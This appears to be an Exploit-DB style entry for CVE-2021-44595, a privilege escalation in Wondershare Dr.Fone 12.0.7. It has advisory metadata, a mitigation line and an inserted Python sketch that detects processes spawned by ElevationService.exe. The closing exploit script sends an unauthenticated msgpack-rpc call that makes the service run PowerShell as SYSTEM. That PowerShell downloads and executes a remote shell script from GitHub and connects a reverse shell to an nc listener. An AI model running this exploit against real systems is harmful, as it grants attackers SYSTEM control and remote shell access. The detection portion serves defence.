Vendor: Dr.Fone
By: Netanel Cohen & Tomer Peled
CVSS: 8.8 HIGH
Privilege Escalation
CWE: 284
Product Name: Dr.Fone
Affected Version From: up to 12.0.7
Affected Version To: up to 12.0.7
Patch Exists: NO
Related CVE: CVE-2021-44595
CPE: a:wondershare:dr.fone:12.0.7
Platforms Tested: Windows 10
2022

Wondershare Dr.Fone 12.0.7 – Privilege Escalation (ElevationService)

The latest version of Wondershare Dr.Fone as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to ElevationService.exe and, without any validation, execute arbitrary code with SYSTEM privileges.

Mitigation:

Patch/update the software to the latest version.
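
A detection sketch for the behaviour described above, added here as an example (not part of the advisory or the authors' code): it scans process-creation events for processes started by ElevationService.exe and ranks command interpreters highest. The Sysmon Event ID 1 field names, the install path, `helper.exe` and the sample events are assumptions constructed for illustration.

```python
import json
import ntpath  # parses Windows paths correctly on any analysis host

# Service binary named in the advisory; matched case-insensitively by file name.
SERVICE = "elevationservice.exe"
# Interpreters that turn one unauthenticated RPC call into arbitrary code execution.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample events (not real telemetry), one JSON object per line.
# Field names follow Sysmon Event ID 1; paths and helper.exe are hypothetical.
SAMPLE_EVENTS = r'''
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Apps\\DrFone\\ElevationService.exe", "User": "NT AUTHORITY\\SYSTEM"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "User": "LAB\\alice"}
{"Image": "C:\\Apps\\DrFone\\helper.exe", "ParentImage": "C:\\Apps\\DrFone\\ElevationService.exe", "User": "NT AUTHORITY\\SYSTEM"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\APPS\\DRFONE\\ELEVATIONSERVICE.EXE", "User": "NT AUTHORITY\\SYSTEM"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage":
'''


def triage(lines):
    """Return (severity, child, user) for every process started by the service."""
    findings = []
    for line in lines.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines instead of aborting
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        if parent != SERVICE:
            continue  # unrelated process tree
        child = ntpath.basename(ev.get("Image", "")).lower()
        # Any child deserves a look; an interpreter under the service is the
        # pattern the advisory describes (code running as SYSTEM).
        severity = "high" if child in INTERPRETERS else "review"
        findings.append((severity, child, ev.get("User", "")))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```
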

Exploit-DB raw data:

# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References: https://github.com/netanelc305/WonderShell

# Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and execute arbitrary code without any validation with SYSTEM privileges.

#!/bin/python3
import msgpackrpc

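# Listener address and port that receive the shell (see the nc command below)
LADDR = "192.168.14.129"
LPORT = 1338

# Host running ElevationService.exe and the port used for its msgpack-rpc endpoint
RADDR = "192.168.14.137"
RPORT = 12345

param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT))
# The service runs the requested program without validating the caller
result = client.call('system_s','powershell',param)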

# stty raw -echo; (stty size; cat) | nc -lvnp 1338